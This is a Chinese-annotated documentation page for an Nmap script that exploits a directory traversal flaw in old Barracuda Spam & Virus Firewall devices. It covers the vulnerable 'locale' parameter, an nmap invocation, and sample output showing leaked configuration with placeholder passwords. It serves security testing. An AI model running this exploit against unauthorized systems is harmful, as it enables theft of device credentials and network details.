http-barracuda-dir-traversal
脚本使用类型:
portrule
脚本所属分类:
intrusive, exploit, auth
脚本下载地址: http://nmap.org/svn/scripts/http-barracuda-dir-traversal.nse
Attempts to retrieve the configuration settings from a Barracuda Networks Spam & Virus Firewall device using the directory traversal vulnerability described at http://seclists.org/fulldisclosure/2010/Oct/119.
This vulnerability is in the "locale" parameter of "/cgi-mod/view_help.cgi" or "/cgi-bin/view_help.cgi", allowing the information to be retrieved from a MySQL database dump. The web administration interface runs on port 8000 by default.
Barracuda Networks Spam & Virus Firewall <= 4.1.1.021 Remote Configuration Retrieval Original exploit by ShadowHatesYou <Shadow@SquatThis.net> For more information, see: http://seclists.org/fulldisclosure/2010/Oct/119 http://www.exploit-db.com/exploits/15130/
Set max cache size. The default value is 100,000. Barracuda config files vary in size mostly due to the number of users. Using a max cache size of 5,000,000 bytes should be enough for config files containing up to 5,000 users.
执行格式
nmap --script http-barracuda-dir-traversal --script-args http-max-cache-size=5000000 -p <port> <host>
PORT STATE SERVICE REASON 8000/tcp open http syn-ack Barracuda Spam firewall http config | http-barracuda-dir-traversal: | Users: 256 | Device: Barracuda Spam Firewall | Version: 4.1.0.0 | Hostname: barracuda | Domain: example.com | Timezone: America/Chicago | Language: en_US | Password: 123456 | API Password: 123456 | MTA SASL LDAP Password: 123456 | Gateway: 192.168.1.1 | Primary DNS: 192.168.1.2 | Secondary DNS: 192.168.1.3 | DNS Cache: No | Backup Server: ftp.example.com | Backup Port: 21 | Backup Type: ftp | Backup Username: user | Backup Password: 123456 | NTP Enabled: Yes | NTP Server: update01.barracudanetworks.com | SSH Enabled: Yes | BRTS Enabled: No | BRTS Server: fp.bl.barracudanetworks.com | HTTP Port: 8000 | HTTP Disabled: No | HTTPS Port: 443 | HTTPS Only: No | | Vulnerable to directory traversal vulnerability: |_http://seclists.org/fulldisclosure/2010/Oct/119
Author: Brendan Coles
License: VER007 整理 http://www.ver007.com